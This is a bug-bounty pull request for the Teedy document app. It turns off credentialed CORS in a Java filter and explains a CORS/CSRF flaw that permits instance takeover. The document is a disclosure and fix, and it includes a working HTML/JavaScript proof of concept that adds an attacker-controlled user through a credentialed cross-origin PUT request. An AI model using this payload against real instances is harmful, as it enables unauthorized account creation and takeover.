### PR TITLE
Fixing CORs Issue That Allows Unautharized Access To The Teedy Instance Via CSRF Adding User.

### DIFF
--- a/docs-web-common/src/main/java/com/sismics/util/filter/CorsFilter.java
+++ b/docs-web-common/src/main/java/com/sismics/util/filter/CorsFilter.java
@@ -26,7 +26,7 @@ public class CorsFilter implements Filter {
         if (EnvironmentUtil.isDevMode() && request.getHeader("origin") != null) {
             // Add CORS in dev mode
             response.addHeader("Access-Control-Allow-Origin", request.getHeader("origin"));
-            response.addHeader("Access-Control-Allow-Credentials", "true");
+            response.addHeader("Access-Control-Allow-Credentials", "false");
             response.addHeader("Access-Control-Max-Age", "3600");
             response.addHeader("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept, Authorization");
             response.addHeader("Access-Control-Allow-Methods", "GET, POST, PUT, DELETE");


### PR DESCRIPTION
### 📊 Metadata *
- CORs Misconfig Chained With Improper CSRF Validation On Cookies Leads To Instance Takeover By Adding a User To The Instance With Attacker Controlled Credentials.

#### Bounty URL: https://www.huntr.dev/bounties/2-other-docs/

### ⚙️ Description *
- This Issue Can Be Fixed With Multiple Fixes. But Before That I Would Like To Explain The Root Case, And Why This's Happening. `docs-web` is Using `docs-web-commons` For Multiple Things. Including The CORs Filter. In `docs-web-common` CORs Filter. You're Returning The Value Of The `request.getHeader("origin")` On The `Access-Control-Allow-Origin` Header. That Allows Any Site On The World To Send HTTP Requests To The Instance And Read The Response Since `Access-Control-Allow-Credentials` Is Set To `true`. Before Using The CORs Under `/api/*` You're Checking If The Application is On Development First. Okay, The Problem Is That Every Manual Builds Are Used With `application.mode`,`dev`. The Users Have To Change That From `pom.xml` But Nothing Is Pointed About It. The Cors Misconfig Can Lead To Sirius Issues. In This Case Attackers Are Able To Add Users Into The Instance With Their Own Credentials Then Login With It And Gain Access To The Teedy Instance. Even On Dev Mode. Developers Won't Need Such Thing. They Can Just Temp. Disable Chrome Protections. The Way You're Handling CORs Isn't Secure. See The Bounty URL. For The Hall Issue Description With a Proof Of Concept For The Instance Takeover. 

### 💻 Technical Description *
- The Fix I Added Was Changing `response.addHeader('Access-Control-Allow-Credentials' , 'true')` Into `response.addHeader('Access-Control-Allow-Credentials' , 'false')` On CORsfilter.java To Disable Sending Credentials With The XHR Requests.

- You Can Apply Other Fixes Like. Adding an Array With Allowed Hosts. Then Check If `origin` Header Is One Of Them. If It's Then Reflect The Origin And Allow Credentials. If It's Not. Then Reflect The Origin Without Credentials Allowed. Tell Me If You Want Me To Apply This Fix. I Can Change The Files Before The PR Getting Accepted/Rejected.

### 🐛 Proof of Concept (PoC) *
- Use This HTML Code With Replacing `{HOST}` With Your Own Teedy Instance Host. Then View On Browser > Click The Button. And Another User Will Be Added To Your Instance And You Will Be Able To Login With: `tester:password123`

```html
<!DOCTYPE html>
<html>
<head>
    <title>Hello World</title>
</head>
<body>
    <div style="text-align: center;">
        <h1>Click The Button Below</h1>
        <input type="button" name="test" onclick="addUser();">
    </div>

    <script type="text/javascript">
        function addUser() {
            const http = new XMLHttpRequest();
            const url = "http://{HOST}:8080/docs-web/api/user?email=hacker@gmail.com&password=password123&passwordconfirm=password123&storage_quota=100000000&username=tester";

            http.withCredentials = true;
            http.open('PUT' , url);
            http.setRequestHeader('Content-Type' , 'application/x-www-form-urlencoded;charset=utf-8')
            http.send();

            http.onreadystatechange = (e) => {
                alert('Exploited!');
            }
        }
    </script>
</body>
</html>
```

### 🔥 Proof of Fix (PoF) *
- Here's a Screen Shot For The Edit I Made On My Instance Code. Now It's Working With Disallowed Credentials.

![Docs-Proof-Of-Fix](https://user-images.githubusercontent.com/54229853/107841239-f6b36600-6dc1-11eb-9ba2-f0599be94cef.png)


### 👍 User Acceptance Testing (UAT)
- as I Said Before. Tested On My Instance.

### 🔗 Relates to...
- https://github.com/418sec/huntr/pull/1877
